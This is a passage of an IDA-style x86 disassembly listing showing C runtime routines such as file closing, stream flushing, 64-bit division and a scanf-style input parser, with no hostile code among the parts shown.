; ---------------------------------------------------------------------------
loc_408AAC: ; CODE XREF: sub_408A4D+10�j
; sub_408A4D+41�j ...
xor edi, edi
loc_408AAE: ; CODE XREF: sub_408A4D+5D�j
push esi
call sub_40ECFC
mov eax, esi
and esi, 1Fh
imul esi, 28h
sar eax, 5
test edi, edi
mov eax, ds:dword_433CA0[eax*4]
pop ecx
mov byte ptr [eax+esi+4], 0
jz short loc_408ADC
push edi
call sub_4057F9
pop ecx
or eax, 0FFFFFFFFh
jmp short loc_408ADE
; ---------------------------------------------------------------------------
loc_408ADC: ; CODE XREF: sub_408A4D+81�j
xor eax, eax
loc_408ADE: ; CODE XREF: sub_408A4D+8D�j
pop edi
pop esi
retn
sub_408A4D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408AE1 proc near ; CODE XREF: sub_403451+48�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 10h
push offset dword_421578
call __SEH_prolog4
mov eax, [ebp+arg_0]
cmp eax, 0FFFFFFFEh
jnz short loc_408B10
call sub_4057E6
and dword ptr [eax], 0
call sub_4057D3
mov dword ptr [eax], 9
loc_408B08: ; CODE XREF: sub_408AE1+5C�j
or eax, 0FFFFFFFFh
jmp loc_408B9E
; ---------------------------------------------------------------------------
loc_408B10: ; CODE XREF: sub_408AE1+12�j
xor edi, edi
cmp eax, edi
jl short loc_408B1E
cmp eax, ds:dword_433C84
jb short loc_408B3F
loc_408B1E: ; CODE XREF: sub_408AE1+33�j
; sub_408AE1+7C�j
call sub_4057E6
mov [eax], edi
call sub_4057D3
mov dword ptr [eax], 9
push edi
push edi
push edi
push edi
push edi
call sub_402F39
add esp, 14h
jmp short loc_408B08
; ---------------------------------------------------------------------------
loc_408B3F: ; CODE XREF: sub_408AE1+3B�j
mov ecx, eax
sar ecx, 5
lea ebx, ds:433CA0h[ecx*4]
mov esi, eax
and esi, 1Fh
imul esi, 28h
mov ecx, [ebx]
movzx ecx, byte ptr [ecx+esi+4]
and ecx, 1
jz short loc_408B1E
push eax
call sub_40EDEE
pop ecx
mov [ebp+ms_exc.disabled], edi
mov eax, [ebx]
test byte ptr [eax+esi+4], 1
jz short loc_408B80
push [ebp+arg_0]
call sub_408A4D
pop ecx
mov [ebp+var_1C], eax
jmp short loc_408B8F
; ---------------------------------------------------------------------------
loc_408B80: ; CODE XREF: sub_408AE1+8F�j
call sub_4057D3
mov dword ptr [eax], 9
or [ebp+var_1C], 0FFFFFFFFh
loc_408B8F: ; CODE XREF: sub_408AE1+9D�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_408BA4
mov eax, [ebp+var_1C]
loc_408B9E: ; CODE XREF: sub_408AE1+2A�j
call __SEH_epilog4
retn
sub_408AE1 endp
; =============== S U B R O U T I N E =======================================
sub_408BA4 proc near ; CODE XREF: sub_408AE1+B5�p
; DATA XREF: .kSjx934:00421590�o
push dword ptr [ebp+8]
call sub_40EE8E
pop ecx
retn
sub_408BA4 endp
; =============== S U B R O U T I N E =======================================
sub_408BAE proc near ; CODE XREF: sub_403451+3C�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
jz short loc_408BD8
test al, 8
jz short loc_408BD8
push dword ptr [esi+8]
call sub_403603
and dword ptr [esi+0Ch], 0FFFFFBF7h
xor eax, eax
pop ecx
mov [esi], eax
mov [esi+8], eax
mov [esi+4], eax
loc_408BD8: ; CODE XREF: sub_408BAE+A�j
; sub_408BAE+E�j
pop esi
retn
sub_408BAE endp
; =============== S U B R O U T I N E =======================================
sub_408BDA proc near ; CODE XREF: sub_403451+34�p
; sub_4087B1+15�p ...
arg_0 = dword ptr 4
push ebx
push esi
mov esi, [esp+8+arg_0]
mov eax, [esi+0Ch]
mov ecx, eax
and cl, 3
xor ebx, ebx
cmp cl, 2
jnz short loc_408C2E
test ax, 108h
jz short loc_408C2E
mov eax, [esi+8]
push edi
mov edi, [esi]
sub edi, eax
test edi, edi
jle short loc_408C2D
push edi
push eax
push esi
call sub_408A20
pop ecx
push eax
call sub_40D420
add esp, 0Ch
cmp eax, edi
jnz short loc_408C26
mov eax, [esi+0Ch]
test al, al
jns short loc_408C2D
and eax, 0FFFFFFFDh
mov [esi+0Ch], eax
jmp short loc_408C2D
; ---------------------------------------------------------------------------
loc_408C26: ; CODE XREF: sub_408BDA+3B�j
or dword ptr [esi+0Ch], 20h
or ebx, 0FFFFFFFFh
loc_408C2D: ; CODE XREF: sub_408BDA+25�j
; sub_408BDA+42�j ...
pop edi
loc_408C2E: ; CODE XREF: sub_408BDA+13�j
; sub_408BDA+19�j
mov eax, [esi+8]
and dword ptr [esi+4], 0
mov [esi], eax
pop esi
mov eax, ebx
pop ebx
retn
sub_408BDA endp
; =============== S U B R O U T I N E =======================================
sub_408C3C proc near ; CODE XREF: sub_408C7E+69�p
; sub_408C7E+84�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jnz short loc_408C4E
push esi
call sub_408C7E
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_408C4E: ; CODE XREF: sub_408C3C+7�j
push esi
call sub_408BDA
test eax, eax
pop ecx
jz short loc_408C5E
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_408C5E: ; CODE XREF: sub_408C3C+1B�j
test word ptr [esi+0Ch], 4000h
jz short loc_408C7A
push esi
call sub_408A20
push eax
call sub_40F04F
pop ecx
pop ecx
neg eax
sbb eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_408C7A: ; CODE XREF: sub_408C3C+28�j
xor eax, eax
pop esi
retn
sub_408C3C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408C7E proc near ; CODE XREF: sub_408C3C+A�p
; sub_408D58+2�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00408D31 SIZE 0000001E BYTES
push 14h
push offset dword_421598
call __SEH_prolog4
xor edi, edi
mov [ebp+var_1C], edi
mov [ebp+var_24], edi
push 1
call sub_4059F7
pop ecx
mov [ebp+ms_exc.disabled], edi
xor esi, esi
loc_408C9F: ; CODE XREF: sub_408C7E+9B�j
mov [ebp+var_20], esi
cmp esi, ds:dword_434DC0
jge loc_408D31
mov eax, ds:dword_433DA0
lea eax, [eax+esi*4]
cmp [eax], edi
jz short loc_408D18
mov eax, [eax]
test byte ptr [eax+0Ch], 83h
jz short loc_408D18
push eax
push esi
call sub_40818A
pop ecx
pop ecx
xor edx, edx
inc edx
mov [ebp+ms_exc.disabled], edx
mov eax, ds:dword_433DA0
mov eax, [eax+esi*4]
mov ecx, [eax+0Ch]
test cl, 83h
jz short loc_408D10
cmp [ebp+arg_0], edx
jnz short loc_408CF7
push eax
call sub_408C3C
pop ecx
cmp eax, 0FFFFFFFFh
jz short loc_408D10
inc [ebp+var_1C]
jmp short loc_408D10
; ---------------------------------------------------------------------------
loc_408CF7: ; CODE XREF: sub_408C7E+66�j
cmp [ebp+arg_0], edi
jnz short loc_408D10
test cl, 2
jz short loc_408D10
push eax
call sub_408C3C
pop ecx
cmp eax, 0FFFFFFFFh
jnz short loc_408D10
or [ebp+var_24], eax
loc_408D10: ; CODE XREF: sub_408C7E+61�j
; sub_408C7E+72�j ...
mov [ebp+ms_exc.disabled], edi
call sub_408D20
loc_408D18: ; CODE XREF: sub_408C7E+3A�j
; sub_408C7E+42�j
inc esi
jmp short loc_408C9F
sub_408C7E endp
; =============== S U B R O U T I N E =======================================
sub_408D1B proc near ; DATA XREF: .kSjx934:004215BC�o
xor edi, edi
mov esi, [ebp-20h]
sub_408D1B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_408D20 proc near ; CODE XREF: sub_408C7E+95�p
mov eax, ds:dword_433DA0
push dword ptr [eax+esi*4]
push esi
call sub_4081DC
pop ecx
pop ecx
retn
sub_408D20 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_408C7E
loc_408D31: ; CODE XREF: sub_408C7E+2A�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_408D4F
cmp [ebp+arg_0], 1
mov eax, [ebp+var_1C]
jz short loc_408D49
mov eax, [ebp+var_24]
loc_408D49: ; CODE XREF: sub_408C7E+C6�j
call __SEH_epilog4
retn
; END OF FUNCTION CHUNK FOR sub_408C7E
; =============== S U B R O U T I N E =======================================
sub_408D4F proc near ; CODE XREF: sub_408C7E+BA�p
; DATA XREF: .kSjx934:004215B0�o
push 1
call sub_40591F
pop ecx
retn
sub_408D4F endp
; =============== S U B R O U T I N E =======================================
sub_408D58 proc near ; CODE XREF: sub_40813B�p
push 1
call sub_408C7E
pop ecx
retn
sub_408D58 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_408D70 proc near ; CODE XREF: sub_403540+29�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
mov eax, [esp+8+arg_C]
or eax, eax
jnz short loc_408D92
mov ecx, [esp+8+arg_8]
mov eax, [esp+8+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+8+arg_0]
div ecx
mov edx, ebx
jmp short loc_408DD3
; ---------------------------------------------------------------------------
loc_408D92: ; CODE XREF: sub_408D70+8�j
mov ecx, eax
mov ebx, [esp+8+arg_8]
mov edx, [esp+8+arg_4]
mov eax, [esp+8+arg_0]
loc_408DA0: ; CODE XREF: sub_408D70+3A�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_408DA0
div ebx
mov esi, eax
mul [esp+8+arg_C]
mov ecx, eax
mov eax, [esp+8+arg_8]
mul esi
add edx, ecx
jb short loc_408DCE
cmp edx, [esp+8+arg_4]
ja short loc_408DCE
jb short loc_408DCF
cmp eax, [esp+8+arg_0]
jbe short loc_408DCF
loc_408DCE: ; CODE XREF: sub_408D70+4E�j
; sub_408D70+54�j
dec esi
loc_408DCF: ; CODE XREF: sub_408D70+56�j
; sub_408D70+5C�j
xor edx, edx
mov eax, esi
loc_408DD3: ; CODE XREF: sub_408D70+20�j
pop esi
pop ebx
retn 10h
sub_408D70 endp
; =============== S U B R O U T I N E =======================================
sub_408DD8 proc near ; CODE XREF: .kSjx934:00409234�p
; .kSjx934:004092AE�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esi]
cmp [esp+arg_0], eax
jnz short loc_408E28
mov ecx, [edi]
cmp ecx, [esp+arg_4]
push 2
push eax
jnz short loc_408E17
call sub_40777A
test eax, eax
pop ecx
pop ecx
mov [edi], eax
jnz short loc_408DFB
loc_408DF8: ; CODE XREF: sub_408DD8+4A�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_408DFB: ; CODE XREF: sub_408DD8+1E�j
mov eax, [esp+arg_8]
mov dword ptr [eax], 1
push dword ptr [esi]
push [esp+4+arg_4]
push dword ptr [edi]
call sub_407BF0
add esp, 0Ch
jmp short loc_408E26
; ---------------------------------------------------------------------------
loc_408E17: ; CODE XREF: sub_408DD8+11�j
push ecx
call sub_40780D
add esp, 0Ch
test eax, eax
jz short loc_408DF8
mov [edi], eax
loc_408E26: ; CODE XREF: sub_408DD8+3D�j
shl dword ptr [esi], 1
loc_408E28: ; CODE XREF: sub_408DD8+6�j
xor eax, eax
inc eax
retn
sub_408DD8 endp
; =============== S U B R O U T I N E =======================================
sub_408E2C proc near ; CODE XREF: sub_408E42+7�p
; .kSjx934:00409148�p ...
dec dword ptr [edx+4]
js short loc_408E3A
mov ecx, [edx]
movzx eax, byte ptr [ecx]
inc ecx
mov [edx], ecx
retn
; ---------------------------------------------------------------------------
loc_408E3A: ; CODE XREF: sub_408E2C+3�j
push edx
call sub_409C8D
pop ecx
retn
sub_408E2C endp
; =============== S U B R O U T I N E =======================================
sub_408E42 proc near ; CODE XREF: .kSjx934:00408FB6�p
; .kSjx934:0040913A�p
arg_0 = dword ptr 4
push ebx
loc_408E43: ; CODE XREF: sub_408E42+1F�j
mov edx, [esp+4+arg_0]
inc dword ptr [esi]
call sub_408E2C
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_408E63
movzx eax, bl
push eax
call sub_40F276
test eax, eax
pop ecx
jnz short loc_408E43
loc_408E63: ; CODE XREF: sub_408E42+11�j
mov eax, ebx
pop ebx
retn
sub_408E42 endp
; ---------------------------------------------------------------------------
push ebp
lea ebp, [esp-18Ch]
sub esp, 1FCh
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+188h], eax
mov eax, [ebp+1A0h]
push ebx
push esi
mov esi, [ebp+194h]
xor ebx, ebx
push edi
mov edi, [ebp+198h]
cmp edi, ebx
mov [ebp-58h], eax
lea eax, [ebp+8]
mov [ebp-14h], esi
mov [ebp-28h], edi
mov [ebp-24h], eax
mov dword ptr [ebp-4Ch], 15Eh
mov [ebp-44h], ebx
mov [ebp-5Ch], ebx
mov [ebp-4], ebx
jnz short loc_408EDC
loc_408EBC: ; CODE XREF: .kSjx934:00408EDE�j
; .kSjx934:00408F2D�j ...
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
jmp loc_409A9C
; ---------------------------------------------------------------------------
loc_408EDC: ; CODE XREF: .kSjx934:00408EBA�j
cmp esi, ebx
jz short loc_408EBC
test byte ptr [esi+0Ch], 40h
jnz loc_408F7B
push esi
call sub_408A20
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_408F24
push esi
call sub_408A20
cmp eax, 0FFFFFFFEh
pop ecx
jz short loc_408F24
push esi
call sub_408A20
sar eax, 5
push esi
lea edi, ds:433CA0h[eax*4]
call sub_408A20
and eax, 1Fh
imul eax, 28h
add eax, [edi]
pop ecx
pop ecx
jmp short loc_408F29
; ---------------------------------------------------------------------------
loc_408F24: ; CODE XREF: .kSjx934:00408EF4�j
; .kSjx934:00408F00�j
mov eax, offset dword_423BD0
loc_408F29: ; CODE XREF: .kSjx934:00408F22�j
test byte ptr [eax+24h], 7Fh
jnz short loc_408EBC
push esi
call sub_408A20
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_408F69
push esi
call sub_408A20
cmp eax, 0FFFFFFFEh
pop ecx
jz short loc_408F69
push esi
call sub_408A20
sar eax, 5
push esi
lea edi, ds:433CA0h[eax*4]
call sub_408A20
and eax, 1Fh
imul eax, 28h
add eax, [edi]
pop ecx
pop ecx
jmp short loc_408F6E
; ---------------------------------------------------------------------------
loc_408F69: ; CODE XREF: .kSjx934:00408F39�j
; .kSjx934:00408F45�j
mov eax, offset dword_423BD0
loc_408F6E: ; CODE XREF: .kSjx934:00408F67�j
test byte ptr [eax+24h], 80h
jnz loc_408EBC
mov edi, [ebp-28h]
loc_408F7B: ; CODE XREF: .kSjx934:00408EE4�j
push dword ptr [ebp+19Ch]
lea ecx, [ebp-6Ch]
call sub_40271F
mov al, [edi]
test al, al
mov [ebp-15h], bl
mov [ebp+4], ebx
mov [ebp-3Ch], ebx
jz loc_409A8C
mov edi, [ebp-28h]
loc_408F9F: ; CODE XREF: .kSjx934:00409A29�j
movzx eax, al
push eax
call sub_40F276
test eax, eax
pop ecx
jz short loc_408FE0
push dword ptr [ebp-14h]
dec dword ptr [ebp+4]
lea esi, [ebp+4]
call sub_408E42
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_408FCC
push dword ptr [ebp-14h]
push eax
call sub_40F29F
pop ecx
pop ecx
loc_408FCC: ; CODE XREF: .kSjx934:00408FBF�j
; .kSjx934:00408FD9�j
inc edi
movzx eax, byte ptr [edi]
push eax
call sub_40F276
test eax, eax
pop ecx
jnz short loc_408FCC
jmp loc_409A25
; ---------------------------------------------------------------------------
loc_408FE0: ; CODE XREF: .kSjx934:00408FAB�j
cmp byte ptr [edi], 25h
jnz loc_4099CD
xor eax, eax
mov [ebp-54h], eax
mov [ebp-3Dh], al
mov [ebp-1Ch], eax
mov [ebp-2Ch], eax
mov [ebp-0Ch], eax
mov [ebp-18h], al
mov [ebp-17h], al
mov [ebp-0Dh], al
mov [ebp+3], al
mov [ebp-16h], al
mov [ebp-5], al
mov byte ptr [ebp-0Eh], 1
mov [ebp-48h], eax
xor esi, esi
loc_409015: ; CODE XREF: .kSjx934:004090E0�j
inc edi
movzx ebx, byte ptr [edi]
movzx eax, bl
push eax
call sub_40F17F
test eax, eax
pop ecx
jz short loc_40903C
mov eax, [ebp-0Ch]
inc dword ptr [ebp-2Ch]
imul eax, 0Ah
lea eax, [eax+ebx-30h]
mov [ebp-0Ch], eax
jmp loc_4090DC
; ---------------------------------------------------------------------------
loc_40903C: ; CODE XREF: .kSjx934:00409025�j
cmp ebx, 4Eh
jg short loc_4090B2
jz loc_4090DC
cmp ebx, 2Ah
jz short loc_4090AD
cmp ebx, 46h
jz loc_4090DC
cmp ebx, 49h
jz short loc_409064
cmp ebx, 4Ch
jnz short loc_4090C1
inc byte ptr [ebp-0Eh]
jmp short loc_4090DC
; ---------------------------------------------------------------------------
loc_409064: ; CODE XREF: .kSjx934:00409058�j
mov cl, [edi+1]
cmp cl, 36h
jnz short loc_409081
lea eax, [edi+2]
cmp byte ptr [eax], 34h
jnz short loc_409081
loc_409074: ; CODE XREF: .kSjx934:004090CC�j
inc dword ptr [ebp-48h]
mov edi, eax
mov [ebp-34h], esi
mov [ebp-30h], esi
jmp short loc_4090DC
; ---------------------------------------------------------------------------
loc_409081: ; CODE XREF: .kSjx934:0040906A�j
; .kSjx934:00409072�j
cmp cl, 33h
jnz short loc_409092
lea eax, [edi+2]
cmp byte ptr [eax], 32h
jnz short loc_409092
mov edi, eax
jmp short loc_4090DC
; ---------------------------------------------------------------------------
loc_409092: ; CODE XREF: .kSjx934:00409084�j
; .kSjx934:0040908C�j
cmp cl, 64h
jz short loc_4090DC
cmp cl, 69h
jz short loc_4090DC
cmp cl, 6Fh
jz short loc_4090DC
cmp cl, 78h
jz short loc_4090DC
cmp cl, 58h
jnz short loc_4090C1
jmp short loc_4090DC
; ---------------------------------------------------------------------------
loc_4090AD: ; CODE XREF: .kSjx934:0040904A�j
inc byte ptr [ebp-0Dh]
jmp short loc_4090DC
; ---------------------------------------------------------------------------
loc_4090B2: ; CODE XREF: .kSjx934:0040903F�j
cmp ebx, 68h
jz short loc_4090D6
cmp ebx, 6Ch
jz short loc_4090C6
cmp ebx, 77h
jz short loc_4090D1
loc_4090C1: ; CODE XREF: .kSjx934:0040905D�j
; .kSjx934:004090A9�j
inc byte ptr [ebp+3]
jmp short loc_4090DC
; ---------------------------------------------------------------------------
loc_4090C6: ; CODE XREF: .kSjx934:004090BA�j
lea eax, [edi+1]
cmp byte ptr [eax], 6Ch
jz short loc_409074
inc byte ptr [ebp-0Eh]
loc_4090D1: ; CODE XREF: .kSjx934:004090BF�j
inc byte ptr [ebp-5]
jmp short loc_4090DC
; ---------------------------------------------------------------------------
loc_4090D6: ; CODE XREF: .kSjx934:004090B5�j
dec byte ptr [ebp-0Eh]
dec byte ptr [ebp-5]
loc_4090DC: ; CODE XREF: .kSjx934:00409037�j
; .kSjx934:00409041�j ...
cmp byte ptr [ebp+3], 0
jz loc_409015
cmp byte ptr [ebp-0Dh], 0
mov [ebp-28h], edi
jnz short loc_4090FD
mov eax, [ebp-58h]
mov esi, [eax]
mov [ebp-70h], eax
add eax, 4
mov [ebp-58h], eax
loc_4090FD: ; CODE XREF: .kSjx934:004090ED�j
cmp byte ptr [ebp-5], 0
mov [ebp-38h], esi
mov byte ptr [ebp+3], 0
jnz short loc_40911C
mov al, [edi]
cmp al, 53h
jz short loc_409118
cmp al, 43h
mov byte ptr [ebp-5], 0FFh
jnz short loc_40911C
loc_409118: ; CODE XREF: .kSjx934:0040910E�j
mov byte ptr [ebp-5], 1
loc_40911C: ; CODE XREF: .kSjx934:00409108�j
; .kSjx934:00409116�j
movzx ebx, byte ptr [edi]
or ebx, 20h
cmp ebx, 6Eh
mov [ebp-20h], ebx
jz short loc_40915F
cmp ebx, 63h
jz short loc_409142
cmp ebx, 7Bh
jz short loc_409142
push dword ptr [ebp-14h]
lea esi, [ebp+4]
call sub_408E42
pop ecx
jmp short loc_40914D
; ---------------------------------------------------------------------------
loc_409142: ; CODE XREF: .kSjx934:0040912D�j
; .kSjx934:00409132�j
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
loc_40914D: ; CODE XREF: .kSjx934:00409140�j
cmp eax, 0FFFFFFFFh
mov [ebp-4], eax
jz loc_409A59
mov esi, [ebp-38h]
mov edi, [ebp-28h]
loc_40915F: ; CODE XREF: .kSjx934:00409128�j
mov ecx, [ebp-2Ch]
test ecx, ecx
jz short loc_409170
cmp dword ptr [ebp-0Ch], 0
jz loc_409A31
loc_409170: ; CODE XREF: .kSjx934:00409164�j
cmp ebx, 6Fh
jg loc_40957C
jz loc_4097A7
cmp ebx, 63h
jz loc_40946E
push 64h
pop eax
cmp ebx, eax
jz loc_4097A7
jle loc_4095A6
cmp ebx, 67h
jle short loc_4091D6
cmp ebx, 69h
jz short loc_4091BE
cmp ebx, 6Eh
jnz loc_4095A6
cmp byte ptr [ebp-0Dh], 0
mov edi, [ebp+4]
jz loc_4099A1
jmp loc_4099C1
; ---------------------------------------------------------------------------
loc_4091BE: ; CODE XREF: .kSjx934:004091A1�j
mov [ebp-20h], eax
loc_4091C1: ; CODE XREF: .kSjx934:0040959B�j
mov ebx, [ebp-4]
cmp ebx, 2Dh
jnz loc_40968F
mov byte ptr [ebp-17h], 1
jmp loc_409694
; ---------------------------------------------------------------------------
loc_4091D6: ; CODE XREF: .kSjx934:0040919C�j
xor ebx, ebx
cmp dword ptr [ebp-4], 2Dh
jnz short loc_4091E7
mov eax, [ebp-24h]
mov byte ptr [eax], 2Dh
inc ebx
jmp short loc_4091ED
; ---------------------------------------------------------------------------
loc_4091E7: ; CODE XREF: .kSjx934:004091DC�j
cmp dword ptr [ebp-4], 2Bh
jnz short loc_4091FE
loc_4091ED: ; CODE XREF: .kSjx934:004091E5�j
dec dword ptr [ebp-0Ch]
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
mov [ebp-4], eax
loc_4091FE: ; CODE XREF: .kSjx934:004091EB�j
cmp dword ptr [ebp-2Ch], 0
jnz short loc_409208
or dword ptr [ebp-0Ch], 0FFFFFFFFh
loc_409208: ; CODE XREF: .kSjx934:00409202�j
movzx eax, byte ptr [ebp-4]
jmp short loc_409255
; ---------------------------------------------------------------------------
loc_40920E: ; CODE XREF: .kSjx934:0040925E�j
mov eax, [ebp-0Ch]
dec dword ptr [ebp-0Ch]
test eax, eax
jz short loc_409260
mov al, [ebp-4]
mov ecx, [ebp-24h]
inc dword ptr [ebp-1Ch]
mov [ebx+ecx], al
lea eax, [ebp-44h]
push eax
lea eax, [ebp+8]
push eax
inc ebx
push ebx
lea edi, [ebp-24h]
lea esi, [ebp-4Ch]
call sub_408DD8
add esp, 0Ch
test eax, eax
jz loc_409A59
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
mov [ebp-4], eax
movzx eax, al
loc_409255: ; CODE XREF: .kSjx934:0040920C�j
push eax
call sub_40F17F
test eax, eax
pop ecx
jnz short loc_40920E
loc_409260: ; CODE XREF: .kSjx934:00409216�j
mov eax, [ebp-6Ch]
mov eax, [eax+0BCh]
mov eax, [eax]
mov al, [eax]
cmp al, [ebp-4]
mov [ebp-18h], al
jnz loc_409316
mov eax, [ebp-0Ch]
dec dword ptr [ebp-0Ch]
test eax, eax
jz loc_409316
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
mov ecx, [ebp-24h]
mov [ebp-4], eax
mov al, [ebp-18h]
mov [ebx+ecx], al
lea eax, [ebp-44h]
push eax
lea eax, [ebp+8]
push eax
inc ebx
push ebx
lea edi, [ebp-24h]
lea esi, [ebp-4Ch]
call sub_408DD8
add esp, 0Ch
test eax, eax
jz loc_409A59
movzx eax, byte ptr [ebp-4]
jmp short loc_40930B
; ---------------------------------------------------------------------------
loc_4092C4: ; CODE XREF: .kSjx934:00409314�j
mov eax, [ebp-0Ch]
dec dword ptr [ebp-0Ch]
test eax, eax
jz short loc_409316
mov eax, [ebp-24h]
mov cl, [ebp-4]
inc dword ptr [ebp-1Ch]
mov [ebx+eax], cl
lea eax, [ebp-44h]
push eax
lea eax, [ebp+8]
push eax
inc ebx
push ebx
lea edi, [ebp-24h]
lea esi, [ebp-4Ch]
call sub_408DD8
add esp, 0Ch
test eax, eax
jz loc_409A59
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
mov [ebp-4], eax
movzx eax, al
loc_40930B: ; CODE XREF: .kSjx934:004092C2�j
push eax
call sub_40F17F
test eax, eax
pop ecx
jnz short loc_4092C4
loc_409316: ; CODE XREF: .kSjx934:00409273�j
; .kSjx934:00409281�j ...
cmp dword ptr [ebp-1Ch], 0
jz loc_409416
cmp dword ptr [ebp-4], 65h
jz short loc_409330
cmp dword ptr [ebp-4], 45h
jnz loc_409416
loc_409330: ; CODE XREF: .kSjx934:00409324�j
mov eax, [ebp-0Ch]
dec dword ptr [ebp-0Ch]
test eax, eax
jz loc_409416
mov eax, [ebp-24h]
mov byte ptr [ebx+eax], 65h
lea eax, [ebp-44h]
push eax
lea eax, [ebp+8]
push eax
inc ebx
push ebx
lea edi, [ebp-24h]
lea esi, [ebp-4Ch]
call sub_408DD8
add esp, 0Ch
test eax, eax
jz loc_409A59
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
cmp eax, 2Dh
mov [ebp-4], eax
jnz short loc_40939B
mov eax, [ebp-24h]
mov byte ptr [ebx+eax], 2Dh
lea eax, [ebp-44h]
push eax
lea eax, [ebp+8]
push eax
inc ebx
push ebx
call sub_408DD8
add esp, 0Ch
test eax, eax
jz loc_409A59
jmp short loc_4093A1
; ---------------------------------------------------------------------------
loc_40939B: ; CODE XREF: .kSjx934:00409376�j
cmp dword ptr [ebp-4], 2Bh
jnz short loc_4093BE
loc_4093A1: ; CODE XREF: .kSjx934:00409399�j
mov eax, [ebp-0Ch]
dec dword ptr [ebp-0Ch]
test eax, eax
jnz short loc_4093B0
and [ebp-0Ch], eax
jmp short loc_4093BE
; ---------------------------------------------------------------------------
loc_4093B0: ; CODE XREF: .kSjx934:004093A9�j
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
mov [ebp-4], eax
loc_4093BE: ; CODE XREF: .kSjx934:0040939F�j
; .kSjx934:004093AE�j
movzx eax, byte ptr [ebp-4]
jmp short loc_40940B
; ---------------------------------------------------------------------------
loc_4093C4: ; CODE XREF: .kSjx934:00409414�j
mov eax, [ebp-0Ch]
dec dword ptr [ebp-0Ch]
test eax, eax
jz short loc_409416
mov eax, [ebp-24h]
mov cl, [ebp-4]
inc dword ptr [ebp-1Ch]
mov [ebx+eax], cl
lea eax, [ebp-44h]
push eax
lea eax, [ebp+8]
push eax
inc ebx
push ebx
lea edi, [ebp-24h]
lea esi, [ebp-4Ch]
call sub_408DD8
add esp, 0Ch
test eax, eax
jz loc_409A59
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
mov [ebp-4], eax
movzx eax, al
loc_40940B: ; CODE XREF: .kSjx934:004093C2�j
push eax
call sub_40F17F
test eax, eax
pop ecx
jnz short loc_4093C4
loc_409416: ; CODE XREF: .kSjx934:0040931A�j
; .kSjx934:0040932A�j ...
dec dword ptr [ebp+4]
cmp dword ptr [ebp-4], 0FFFFFFFFh
jz short loc_40942C
push dword ptr [ebp-14h]
push dword ptr [ebp-4]
call sub_40F29F
pop ecx
pop ecx
loc_40942C: ; CODE XREF: .kSjx934:0040941D�j
cmp dword ptr [ebp-1Ch], 0
jz loc_409A59
cmp byte ptr [ebp-0Dh], 0
jnz loc_4099C1
mov eax, [ebp-24h]
inc dword ptr [ebp-3Ch]
lea ecx, [ebp-6Ch]
push ecx
push eax
push dword ptr [ebp-38h]
mov byte ptr [ebx+eax], 0
movsx eax, byte ptr [ebp-0Eh]
dec eax
push eax
push ds:off_423F9C
call sub_405193
pop ecx
call eax
add esp, 10h
jmp loc_4099C1
; ---------------------------------------------------------------------------
loc_40946E: ; CODE XREF: .kSjx934:00409182�j
test ecx, ecx
jnz short loc_40947C
inc dword ptr [ebp-0Ch]
mov dword ptr [ebp-2Ch], 1
loc_40947C: ; CODE XREF: .kSjx934:00409470�j
; .kSjx934:0040958A�j
cmp byte ptr [ebp-5], 0
jle short loc_409486
mov byte ptr [ebp-16h], 1
loc_409486: ; CODE XREF: .kSjx934:00409480�j
; .kSjx934:0040968A�j
dec dword ptr [ebp+4]
cmp dword ptr [ebp-4], 0FFFFFFFFh
mov edi, esi
jz short loc_40949E
push dword ptr [ebp-14h]
push dword ptr [ebp-4]
call sub_40F29F
pop ecx
pop ecx
loc_40949E: ; CODE XREF: .kSjx934:0040948F�j
; .kSjx934:0040974D�j ...
cmp dword ptr [ebp-2Ch], 0
jz short loc_4094B2
mov eax, [ebp-0Ch]
dec dword ptr [ebp-0Ch]
test eax, eax
jz loc_40976B
loc_4094B2: ; CODE XREF: .kSjx934:004094A2�j
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
cmp eax, 0FFFFFFFFh
mov [ebp-4], eax
jz loc_409758
cmp ebx, 63h
jz short loc_409517
cmp ebx, 73h
jnz short loc_4094E6
